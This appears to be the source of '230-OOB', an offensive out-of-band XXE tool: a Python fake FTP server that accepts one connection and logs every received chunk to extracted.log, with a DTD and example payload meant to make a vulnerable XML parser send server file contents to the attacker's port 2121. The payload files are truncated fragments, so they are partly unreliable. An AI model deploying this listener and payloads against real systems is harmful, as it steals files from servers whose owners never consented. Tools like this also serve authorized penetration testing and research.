├── logo.png
├── oob.dtd
├── example_payload.xml
├── .gitattributes
├── README.md
├── .gitignore
└── 230.py
/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lc/230-OOB/HEAD/logo.png
--------------------------------------------------------------------------------
/oob.dtd:
--------------------------------------------------------------------------------
1 |
2 | :2121/%d;'>">
3 |
--------------------------------------------------------------------------------
/example_payload.xml:
--------------------------------------------------------------------------------
1 |
2 | %asd;%c;]>
3 | &rrr;
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
4 | # Custom for Visual Studio
5 | *.cs diff=csharp
6 |
7 | # Standard to msysgit
8 | *.doc diff=astextplain
9 | *.DOC diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot diff=astextplain
13 | *.DOT diff=astextplain
14 | *.pdf diff=astextplain
15 | *.PDF diff=astextplain
16 | *.rtf diff=astextplain
17 | *.RTF diff=astextplain
18 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |

3 |
4 |
Out-of-Band XXE tool
5 |
6 | A python script to achieve file read via FTP!
7 |
8 |
9 |
10 |
11 | 230OOB is a tool that emulates an FTP server, assisting you in achieving file read via Out-of-Band XXE.
12 |
13 |
14 | ### Installation
15 | ```
16 | git clone https://github.com/lc/230-OOB
17 | ```
18 |
19 | ### Usage:
20 | Generate an XXE payload & DTD at http://xxe.sh
21 |
22 | Start the server:
23 | ```
24 | python3 230.py 2121
25 | ```
26 | Everything the server receives is appended to `extracted.log` in the current directory.
27 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Windows image file caches
2 | Thumbs.db
3 | ehthumbs.db
4 |
5 | # Folder config file
6 | Desktop.ini
7 |
8 | # Recycle Bin used on file shares
9 | $RECYCLE.BIN/
10 |
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 |
17 | # Windows shortcuts
18 | *.lnk
19 |
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 |
24 | # OSX
25 | # =========================
26 |
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 |
31 | # Thumbnails
32 | ._*
33 |
34 | # Files that might appear in the root of a volume
35 | .DocumentRevisions-V100
36 | .fseventsd
37 | .Spotlight-V100
38 | .TemporaryItems
39 | .Trashes
40 | .VolumeIcon.icns
41 |
42 | # Directories potentially created on remote AFP share
43 | .AppleDB
44 | .AppleDesktop
45 | Network Trash Folder
46 | Temporary Items
47 | .apdisk
48 |
49 | # Project files
50 | extracted.log
51 |
--------------------------------------------------------------------------------
/230.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import socket
3 | import sys
4 | import argparse
5 |
6 |
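# Startup banner. A raw string is used because the ASCII art contains
# backslashes that are not valid escape sequences (for example "\(" and "\|");
# newer Python versions warn about those in ordinary string literals. The
# text itself is unchanged.
name = r"""
=--------------------------------------=
| 230 OOB || an Out-Of-Band XXE tool |
| ____ _____ ___ ___ ____ |
| (___ \(__ / / _ \ / _ \| _ \ |
| __) ) / / | | | | | | | |_) ) |
| / __/ (__ \| | | | | | | _ ( |
| | |___ ___) ) |_| | |_| | |_) ) |
| |_____|____/ \___/ \___/|____/ |
| by Corben Leo |
| |
| - https://www.corben.io |
| - https://hackerone.com/cdl |
| - https://twitter.com/hacker_ |
=--------------------------------------=
"""

print(name)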
25 |
# Command line: one required positional argument, the TCP port to listen on.
parser = argparse.ArgumentParser(
    description='An Out-of-Band XXE tool by Corben Leo',
)
parser.add_argument(
    'port',
    type=int,
    help="Port for the FTP server to listen on (2121 / 21)",
)
args = parser.parse_args()

# An empty host string makes bind() listen on every local IPv4 interface,
# so the listener is reachable from any network the machine is attached to.
HOST = ''
PORT = args.port

# Canned FTP replies sent to the connecting client.
welcome = b'220 oob-xxe\n'
ftp_catch_all_response = b'230 more data please!\n'
ftp_user_response = b'331 hello world!\n'
ftp_pass_response = b'230 my password is also hunter2!\n'

# Listening socket; main() binds it and the Ctrl-C handler at the bottom of
# the file closes it.
s = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
39 |
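def main():
    """Run the single-connection fake FTP listener.

    Binds the module-level socket ``s`` to ``(HOST, PORT)``, accepts one
    client, sends the ``welcome`` banner, then answers every received chunk
    with a canned reply while printing the chunk and appending it to the log
    through ``extract``. Returns once the peer closes the connection.

    Everything read from the connection is untrusted input: it is printed to
    the terminal and written to the log without filtering.

    Raises:
        SystemExit: with status 1 if the socket cannot be bound.
    """
    try:
        s.bind((HOST, PORT))
    except socket.error as msg:
        # Report the OS error and exit non-zero so a failed start is visible
        # to the caller.
        print('[+] ERROR: Bind failed. ' + str(msg))
        sys.exit(1)

    s.listen(10)
    print('[+] 230OOB started on port: ' + str(PORT))

    # Only one connection is ever accepted; later clients wait in the backlog.
    conn, addr = s.accept()
    try:
        print('[*] Connection from: ' + addr[0] + "!")
        conn.sendall(welcome)

        while True:
            data = conn.recv(1024)
            if not data:
                # recv() returns b'' once the peer has closed the connection.
                # Without this check the loop keeps replying on a dead socket.
                break

            ftp_command = data.split(b" ", 1)
            # NOTE(review): the lookup key is bytes while the table keys are
            # str, so neither entry can match and every command receives
            # ftp_catch_all_response. Left as is to keep the replies on the
            # wire unchanged; switch the keys to bytes if the USER/PASS
            # replies are meant to be sent.
            response = {
                'user': ftp_user_response,
                'pass': ftp_pass_response,
            }.get(ftp_command[0].lower(), ftp_catch_all_response)
            conn.sendall(response)

            # The peer controls these bytes; replace undecodable sequences
            # instead of letting UnicodeDecodeError abort the listener.
            line = data.decode('UTF-8', errors='replace')
            line = line.replace("\n", "").replace("CWD", "")
            # NOTE(review): control characters (e.g. terminal escape
            # sequences) in the received text reach the console and the log
            # as sent.
            print(line)
            extract(line)
    finally:
        # Release both sockets on every exit path, including Ctrl-C.
        conn.close()
        s.close()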
68 |
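def extract(data):
    """Append ``data`` to ``./extracted.log`` exactly as given.

    No separator or newline is added, so successive calls run together in
    the file. The only caller in this file passes text received from the
    network peer, so the log holds untrusted content; view it with tools
    that do not interpret control characters.

    Args:
        data: Text to append.
    """
    # The context manager closes the handle even if write() raises; UTF-8 is
    # set explicitly so the result does not depend on the locale's encoding.
    with open('./extracted.log', 'a', encoding='utf-8') as log_file:
        log_file.write(data)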
73 |
# Script entry point: run the listener until it returns or the operator
# interrupts it.
try:
    main()
except KeyboardInterrupt:
    # Ctrl-C: close the listening socket before the interpreter exits.
    s.close()
78 |
--------------------------------------------------------------------------------